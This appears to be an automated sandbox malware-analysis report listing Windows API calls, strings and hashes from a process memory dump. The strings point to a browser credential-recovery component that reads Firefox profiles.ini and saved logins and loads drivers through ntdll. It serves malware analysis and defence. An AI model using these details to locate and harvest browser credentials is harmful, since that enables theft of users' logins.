                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                          • API String ID: 3492182834-2163367763
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
